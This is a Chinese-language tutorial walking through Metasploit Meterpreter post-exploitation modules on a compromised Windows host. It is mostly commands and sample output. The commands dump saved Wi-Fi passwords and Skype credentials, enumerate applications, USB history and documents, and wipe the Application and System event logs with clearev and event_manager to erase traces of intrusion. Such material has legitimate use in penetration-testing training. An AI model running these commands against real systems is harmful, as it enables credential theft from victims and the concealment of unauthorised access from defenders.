Metasploit之——其他后渗透模块（metasploit内网穿透）

Metasploit之——其他后渗透模块（metasploit内网穿透）

1.收集无线SSID信息

run post/windows/wlan/wlan_bss_listmeterpreter > run post/windows/wlan/wlan_bss_list

2.收集无线Wifi密码

run post/windows/wlan/wlan_profile

可以收集目标系统上保存的Wifi登录凭证。

meterpreter > run post/windows/wlan/wlan_profile

3.获取应用程序列表

run get_application_listmeterpreter > run get_application_list[!] Meterpreter scripts are deprecated. Try post/windows/gather/enum_applications.[!] Example: run post/windows/gather/enum_applications OPTION=value [...]Installed Applications====================== Name Version ---- ------- Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148 Radmin Server 3.5 3.50.0000 WebFldrs XP 9.50.7523meterpreter >

4.获取Skype密码

run post/windows/gather/credentials/skypemeterpreter > run post/windows/gather/credentials/skype

5.获取USB使用历史信息

run post/windows/gather/usb_historymeterpreter > run post/windows/gather/usb_history[*] Running module against LIUYAZHUANG[*] D: IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} E: Disk 31ac31ab [-] No USB devices appear to have been connected to this host.meterpreter >

利用这个模块可以轻松的伪造USB描述符合硬件ID

6.查找文件

meterpreter > search -f *.docFound 6 results... c:\Documents and Settings\Default User\Templates\winword.doc (4608 bytes) c:\Documents and Settings\Default User\Templates\winword2.doc (1769 bytes) c:\Documents and Settings\lyz\Templates\winword.doc (4608 bytes) c:\Documents and Settings\lyz\Templates\winword2.doc (1769 bytes) c:\WINDOWS\system32\config\systemprofile\Templates\winword.doc (4608 bytes) c:\WINDOWS\system32\config\systemprofile\Templates\winword2.doc (1769 bytes)meterpreter >

7.清除目标系统上的日志

clearevmeterpreter > clearev[*] Wiping 190 records from Application...[*] Wiping 286 records from System...

另一个用来处理日志的模块就是event_manager

meterpreter > run event_manager Meterpreter Script for Windows Event Log Query and Clear.OPTIONS: -c Clear a given Event Log (or ALL if no argument specified) -f Event ID to filter events on -h Help menu -i Show information about Event Logs on the System and their configuration -l List a given Event Log. -p Supress printing filtered logs to screen -s Save logs to local CSV file, optionally specify alternate folder in which to save logsmeterpreter > meterpreter > run event_manager -i[*] Retriving Event Log ConfigurationEvent Logs on System==================== Name Retention Maximum Size Records ---- --------- ------------ ------- Application Disabled 524288K 0 Security Disabled 524288K Access Denied System Disabled 524288K 0 ThinPrint Diagnostics Disabled K 1meterpreter > run event_manager -c[-] You must specify and eventlog to query![*] Application: [*] Clearing Application[*] Event Log Application Cleared![*] Security: [*] Clearing Security[-] Failed to Clear Security, Access Denied[*] System: [*] Clearing System[*] Event Log System Cleared![*] ThinPrint Diagnostics: [*] Clearing ThinPrint Diagnostics[*] Event Log ThinPrint Diagnostics Cleared!meterpreter > meterpreter > meterpreter > run event_manager -i[*] Retriving Event Log ConfigurationEvent Logs on System

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。